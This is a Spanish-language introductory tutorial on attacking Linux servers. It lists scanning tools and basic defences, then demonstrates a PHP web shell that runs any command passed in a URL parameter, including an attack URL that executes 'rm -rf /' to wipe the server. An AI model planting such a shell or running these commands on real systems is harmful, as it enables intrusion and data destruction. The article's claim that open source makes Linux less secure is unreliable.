Hackear el sistema operativo Linux: hackear con Ubuntu (Tutorial de comandos)
Linux es el sistema operativo para servidores más utilizado, especialmente para servidores web. Es de código abierto, lo que significa que cualquiera puede tener acceso al código fuente. Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades.. Linux for Hackers consiste en explotar estas vulnerabilidades para obtener acceso no autorizado a un sistema.
En este artículo, le presentaremos qué es Linux, sus vulnerabilidades de seguridad, piratería con Ubuntu y las contramedidas que puede implementar.
Nota rápida sobre Linux
Linux es un sistema operativo de código abiertoExisten muchas distribuciones de sistemas operativos basados en Linux, como Redhat, Fedora y Ubuntu, etc. A diferencia de otros sistemas operativos, Linux es menos seguro en lo que se refiere a seguridad. Esto se debe a que el código fuente está disponible de forma gratuita, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto. Linux se puede utilizar como sistema operativo para servidores, computadoras de escritorio, tabletas o dispositivos móviles.
Los programas de Linux se pueden manejar mediante la interfaz gráfica de usuario o comandos. Los comandos de Linux para Kali Linux La piratería es más efectiva y eficiente en comparación con el uso de la GUI. Por esta razón, es útil conocer los comandos básicos de Linux para hackear.
Consulte estos tutoriales. https://www.guru99.com/unix-linux-tutorial.html sobre cómo empezar con Kali Linux hacks
Herramientas de piratería de Linux
- Nessus– esta herramienta se puede utilizar para Ubuntu piratear, escanear ajustes de configuración, parches y redes, etc., se puede encontrar en https://www.tenable.com/products/nessus
- Mapa N. Esta herramienta se puede utilizar para monitorear los hosts que se ejecutan en el servidor y los servicios que utilizan. También se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
- SARA – SARA es el acrónimo de Asistente de Investigación del Auditor de Seguridad. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL Injection, XSS, etc., se puede encontrar en http://www-arc.com/sara/sara.html
La lista de arriba no es exhaustiva; le da una idea de las herramientas disponibles para Ubuntu Hackear y hackear sistemas Linux.
Cómo prevenir hacks de Linux
Los ataques de hackers a Linux se aprovechan de las vulnerabilidades del sistema operativo. Una organización puede adoptar la siguiente política para protegerse contra este tipo de ataques.
- Gestión de parches– los parches corrigen errores que los atacantes aprovechan para comprometer un sistema. Una buena política de gestión de parches garantizará que aplique constantemente parches relevantes a su sistema.
- Configuración adecuada del sistema operativo– otros exploits aprovechan las debilidades en la configuración del servidor. Se deben desactivar los nombres de usuario y los daemons inactivos. Se deben cambiar las configuraciones predeterminadas, como las contraseñas comunes para la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
- Sistema de detección de intrusos– estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir este tipo de ataques.
Actividad de piratería: piratear un Ubuntu Sistema Linux usando PHP
En este escenario práctico, aprenderemos cómo hackear con Ubuntu y le proporcionaremos información básica sobre cómo puede utilizar PHP comprometer un Linux. No vamos a apuntar a ninguna víctima. Si desea probarlo, puede instalar LAMPP en su máquina local.
PHP viene con dos funciones que pueden usarse para ejecutar comandos de piratería de Linux. Tiene funciones exec() y shell_exec(). La función exec() devuelve la última línea de la salida del comando mientras que shell_exec() devuelve el resultado completo del comando como una cadena.
Para fines de demostración, supongamos que el atacante logra cargar el siguiente archivo en un servidor web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
AQUÍ,
El script anterior obtiene el comando de la variable GET denominada cmd. El comando se ejecuta usando shell_exec() y los resultados se devuelven en el navegador.
El código anterior se puede explotar utilizando la siguiente URL
http://localhost/cp/konsole.php?cmd=ls%20-l
AQUÍ,
- “…konsole.php?cmd=ls%20-l”asigna el valor ls –l a la variable cmd.
El comando en Ubuntu para hackear contra el servidor se ejecutará como
shell_exec('ls -l') ;
La ejecución del código anterior en un servidor web arroja resultados similares a los siguientes.
El comando anterior simplemente muestra los archivos en el directorio actual y los permisos.
Supongamos que el atacante pasa el siguiente comando
rm -rf /
AQUÍ,
- “rm” elimina los archivos
- "rf" hace que el comando rm se ejecute en modo recursivo. Eliminar todas las carpetas y archivos
- “/” indica al comando que comience a eliminar archivos del directorio raíz
La URL del ataque se vería así
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Resumen
- Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
- Linux Es de código abierto y cualquiera puede obtener el código fuente. Esto facilita la detección de vulnerabilidades. Es uno de los mejores sistemas operativos para piratas informáticos.
- Comandos básicos y de hacking de redes en Ubuntu son valiosos para los piratas informáticos de Linux.
- Las vulnerabilidades son una debilidad que puede explotarse para comprometer un sistema.
- Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.